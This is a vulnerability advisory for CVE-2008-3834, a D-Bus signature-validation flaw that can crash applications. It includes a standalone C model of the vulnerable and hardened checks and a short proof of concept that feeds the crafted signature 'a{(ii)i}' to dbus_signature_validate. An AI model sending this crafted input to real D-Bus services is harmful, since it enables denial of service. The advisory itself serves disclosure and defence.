BUGTRAQ ID: 31602
CVE(CAN) ID: CVE-2008-3834
D-BUS is a message bus system designed for communication between applications.
The D-BUS function _dbus_validate_signature_with_reason() does not correctly validate type codes:
    if (last == DBUS_DICT_ENTRY_BEGIN_CHAR &&
        !dbus_type_is_basic (*p))
      {
        result = DBUS_INVALID_DICT_KEY_MUST_BE_BASIC_TYPE;
        goto out;
      }
If an application that uses D-Bus is tricked into validating a specially crafted signature, it may terminate.
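The following added example is not D-Bus code and is not part of the advisory; it models the dict-entry-key check above in standalone C so the failure mode can be observed without libdbus. The same rule is applied twice: once through a classification helper whose precondition is "the argument is a valid type code", which is tripped by the '(' that opens the struct key in "a{(ii)i}" (the advisory's described outcome, process termination, is assumed here to come from such a failed check and is only counted, not aborted on), and once with the key's validity decided before it is classified, so the crafted signature is rejected with the DICT_KEY_MUST_BE_BASIC_TYPE result and nothing else happens. The names check_dict_keys, type_is_valid, type_is_basic_with_precondition and last_precondition_failures are this example's own; the type-code letters are the ones the D-Bus specification defines.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Result codes modelled on the advisory's DBUS_INVALID_DICT_KEY_MUST_BE_BASIC_TYPE. */
enum sig_result {
    SIG_VALID = 0,
    SIG_DICT_KEY_MUST_BE_BASIC_TYPE
};

/* Number of times the precondition-checking helper was handed a code it does
 * not accept during the last check_dict_keys() call. In a real library such a
 * failure is an assertion that may terminate the process (assumption); here it
 * is only counted so both code paths run to completion. */
int last_precondition_failures = 0;

/* Basic (non-container) type codes from the D-Bus specification. */
static bool type_is_basic(int c)
{
    return c != '\0' && strchr("ybnqiuxtdsogh", c) != NULL;
}

/* Complete single type codes: basic types, array, variant, and the abstract
 * struct/dict-entry codes 'r' and 'e'. The '(' and '{' characters that open a
 * struct or dict entry inside a signature string are delimiters, not type
 * codes, so they fail this test. */
static bool type_is_valid(int c)
{
    return type_is_basic(c) || c == 'a' || c == 'v' || c == 'r' || c == 'e';
}

/* Vulnerable pattern: a classifier whose precondition is "c is a valid type
 * code". Passing it a delimiter such as '(' trips the precondition. */
static bool type_is_basic_with_precondition(int c)
{
    if (!type_is_valid(c)) {
        last_precondition_failures++;
        return false;
    }
    return type_is_basic(c);
}

/* Applies only the dict-entry-key rule to a signature string: the type code
 * following '{' must be a basic type. With hardened == false the key goes
 * straight to the precondition-checking classifier; with hardened == true its
 * validity is decided first. Other signature rules are out of scope here. */
enum sig_result check_dict_keys(const char *sig, bool hardened)
{
    int last = '\0';
    last_precondition_failures = 0;

    for (const char *p = sig; *p != '\0'; p++) {
        if (last == '{') {
            bool key_ok = hardened
                ? (type_is_valid(*p) && type_is_basic(*p))
                : type_is_basic_with_precondition(*p);
            if (!key_ok)
                return SIG_DICT_KEY_MUST_BE_BASIC_TYPE;
        }
        last = *p;
    }
    return SIG_VALID;
}

static void report(const char *label, const char *sig, bool hardened)
{
    enum sig_result r = check_dict_keys(sig, hardened);   /* evaluate before reading the counter */
    printf("%-10s %-9s -> result %d, precondition failures %d\n",
           label, sig, r, last_precondition_failures);
}

int main(void)
{
    const char *crafted = "a{(ii)i}";   /* the advisory's proof-of-concept signature */
    const char *benign  = "a{sv}";      /* constructed well-formed dict signature */

    report("unhardened", crafted, false);
    report("hardened", crafted, true);
    report("hardened", benign, true);
    return 0;
}
```

The point the two paths make is that a public classifier such as dbus_type_is_basic() is not an input-validation predicate: it is entitled to treat an out-of-domain argument as a caller bug, so untrusted bytes must be proven in-domain before being handed to it.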
D-Bus dbus_signature_validate() Type Signature Denial of Service Vulnerability
Published:2008-10-06
Vulnerable:
D-Bus 1.2.1
Description:
Credit: schelte (schelte@wanadoo.nl)
References:
http://secunia.com/advisories/32127/
https://bugs.freedesktop.org/show_bug.cgi?format=multiple&id=17803
SEBUG Solution:
D-Bus
-----
The vendor has released an update to fix this security issue; download it from the vendor's homepage:
http://admin.fedoraproject.org/updates/dbus-1.2.4-1.fc9
Exploit:
[www.sebug.net]
The following procedures (methods) may contain offensive material; they are provided only for security research and teaching, and you use them at your own risk!
#include <dbus/dbus.h>

/* Asks libdbus to validate a dict-entry signature whose key is the struct
 * "(ii)" rather than a basic type. On D-Bus 1.2.1 this reaches the faulty
 * check described above and the process can terminate; a fixed library
 * simply reports the signature as invalid, so the program exits with 1. */
int main (void)
{
    /* NULL DBusError: only the boolean result is needed here. */
    return !dbus_signature_validate ("a{(ii)i}", NULL);
}
// Sebug.net [ 2008-10-10 ]